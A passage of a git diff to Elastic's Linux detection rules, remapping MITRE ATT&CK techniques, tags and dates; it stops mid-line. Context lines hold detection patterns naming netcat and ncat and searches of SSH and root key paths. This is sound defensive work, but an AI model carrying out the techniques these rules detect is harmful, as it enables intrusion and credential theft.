[rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.name"] diff --git a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml index fd5e8cd4af8..b1e0758e17c 100644 --- a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml +++ b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -105,15 +105,25 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] -id = "T1562" name = "Impair Defenses" +id = "T1562" reference = "https://attack.mitre.org/techniques/T1562/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique.subtechnique]] +name = "Indicator Blocking" +id = "T1562.006" +reference = "https://attack.mitre.org/techniques/T1562/006/" + +[[rule.threat.technique]] +name = "Subvert Trust Controls" +id = "T1553" +reference = "https://attack.mitre.org/techniques/T1553/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/defense_evasion_unusual_preload_env_vars.toml b/rules/linux/defense_evasion_unusual_preload_env_vars.toml index bc08faf6393..fb5343a26bc 100644 --- a/rules/linux/defense_evasion_unusual_preload_env_vars.toml +++ b/rules/linux/defense_evasion_unusual_preload_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -57,7 +57,15 @@ After saving the integration change, the Elastic Agents running this policy will For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -120,6 +128,25 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["process.env_vars"] diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml index 40244d95a62..dcf6cbd1ec0 100644 --- a/rules/linux/defense_evasion_user_or_group_deletion.toml +++ b/rules/linux/defense_evasion_user_or_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -69,7 +69,13 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -80,11 +86,11 @@ iam where host.os.type == "linux" and event.type in ("group", "user") and event. framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml index 1fe2cb6e7fb..533fff59b87 100644 --- a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml +++ b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/11" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -97,10 +108,42 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["file.path", "process.executable"] diff --git a/rules/linux/discovery_dynamic_linker_via_od.toml b/rules/linux/discovery_dynamic_linker_via_od.toml index 41be32281ac..40420f501f9 100644 --- a/rules/linux/discovery_dynamic_linker_via_od.toml +++ b/rules/linux/discovery_dynamic_linker_via_od.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_esxi_software_via_find.toml b/rules/linux/discovery_esxi_software_via_find.toml index 6d9fffd4a0c..a2e43bc8e59 100644 --- a/rules/linux/discovery_esxi_software_via_find.toml +++ b/rules/linux/discovery_esxi_software_via_find.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -113,11 +113,6 @@ not ?process.parent.executable == "/usr/lib/vmware/viewagent/bin/uninstall_viewa [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_esxi_software_via_grep.toml b/rules/linux/discovery_esxi_software_via_grep.toml index bdacb1c0cb6..af3f9c6de0c 100644 --- a/rules/linux/discovery_esxi_software_via_grep.toml +++ b/rules/linux/discovery_esxi_software_via_grep.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -114,9 +114,9 @@ not ?process.parent.executable in ("/usr/share/qemu/init/qemu-kvm-init", "/etc/s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml index 1168b4f3c91..401470b341b 100644 --- a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml +++ b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -56,7 +56,19 @@ This rule detects common Linux utilities and shells reading kprobes and tracing risk_score = 21 rule_id = "fb542346-1624-4cf2-bcc7-c68abaab261b" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -76,11 +88,24 @@ process.args like ("/sys/kernel/debug/kprobes/*", "/sys/kernel/debug/tracing/*", framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml index 4bdbc4b9a63..e78a5b7070c 100644 --- a/rules/linux/discovery_kernel_module_enumeration.toml +++ b/rules/linux/discovery_kernel_module_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -122,14 +122,15 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/discovery_kernel_seeking.toml b/rules/linux/discovery_kernel_seeking.toml index 419aec12283..f7159bd2840 100644 --- a/rules/linux/discovery_kernel_seeking.toml +++ b/rules/linux/discovery_kernel_seeking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -109,12 +117,20 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_unpacking.toml b/rules/linux/discovery_kernel_unpacking.toml index 216000df4dc..5fd3d44ce52 100644 --- a/rules/linux/discovery_kernel_unpacking.toml +++ b/rules/linux/discovery_kernel_unpacking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -78,7 +78,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -107,12 +115,20 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml index 154c255d524..499b8b47ad0 100644 --- a/rules/linux/discovery_kubeconfig_file_discovery.toml +++ b/rules/linux/discovery_kubeconfig_file_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -92,7 +92,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Defend for Containers", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -132,27 +142,9 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_kubectl_permission_discovery.toml b/rules/linux/discovery_kubectl_permission_discovery.toml index 321afa12afc..51b3731597f 100644 --- a/rules/linux/discovery_kubectl_permission_discovery.toml +++ b/rules/linux/discovery_kubectl_permission_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -119,9 +119,9 @@ process.name == "kubectl" and process.args == "auth" and process.args == "can-i" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml index c962146b215..13cafc9195f 100644 --- a/rules/linux/discovery_linux_hping_activity.toml +++ b/rules/linux/discovery_linux_hping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -128,13 +128,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml index efbbef38924..0e020284684 100644 --- a/rules/linux/discovery_linux_nping_activity.toml +++ b/rules/linux/discovery_linux_nping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -128,18 +128,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" - [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml index 4489c16b91c..221cc4ff072 100644 --- a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml +++ b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -112,9 +112,9 @@ process.command_line like ("/etc/exports", "/etc/fstab") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1135" -name = "Network Share Discovery" -reference = "https://attack.mitre.org/techniques/T1135/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_pam_version_discovery.toml b/rules/linux/discovery_pam_version_discovery.toml index b850ea0830e..fd9295a70a0 100644 --- a/rules/linux/discovery_pam_version_discovery.toml +++ b/rules/linux/discovery_pam_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -86,7 +86,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,11 +123,37 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_ping_sweep_detected.toml b/rules/linux/discovery_ping_sweep_detected.toml index 081d7c941ab..1cffefe920a 100644 --- a/rules/linux/discovery_ping_sweep_detected.toml +++ b/rules/linux/discovery_ping_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -110,11 +110,6 @@ process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" - [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -124,6 +119,7 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threshold] field = ["host.id", "process.parent.entity_id", "process.executable"] value = 1 diff --git a/rules/linux/discovery_polkit_version_discovery.toml b/rules/linux/discovery_polkit_version_discovery.toml index 7bd3c7400e3..2420b1dc14c 100644 --- a/rules/linux/discovery_polkit_version_discovery.toml +++ b/rules/linux/discovery_polkit_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -111,9 +111,9 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml index c953db6b472..413d337fc5a 100644 --- a/rules/linux/discovery_private_key_password_searching_activity.toml +++ b/rules/linux/discovery_private_key_password_searching_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -110,30 +110,25 @@ process.command_line like ("*/home/*", "*/etc/ssh*", "*/root/*", "/") [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1552.004" -name = "Private Keys" -reference = "https://attack.mitre.org/techniques/T1552/004/" +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/discovery_proc_maps_read.toml b/rules/linux/discovery_proc_maps_read.toml index cc4db1da87b..986cceed84d 100644 --- a/rules/linux/discovery_proc_maps_read.toml +++ b/rules/linux/discovery_proc_maps_read.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -86,7 +86,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Credential Access", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,3 +127,21 @@ reference = "https://attack.mitre.org/techniques/T1057/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.007" +name = "Proc Filesystem" +reference = "https://attack.mitre.org/techniques/T1003/007/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_process_capabilities.toml b/rules/linux/discovery_process_capabilities.toml index ae91749e8cf..41b4c8bda26 100644 --- a/rules/linux/discovery_process_capabilities.toml +++ b/rules/linux/discovery_process_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -101,9 +101,9 @@ In Linux environments, the `getcap` command is used to list file capabilities, w framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1057" +name = "Process Discovery" +reference = 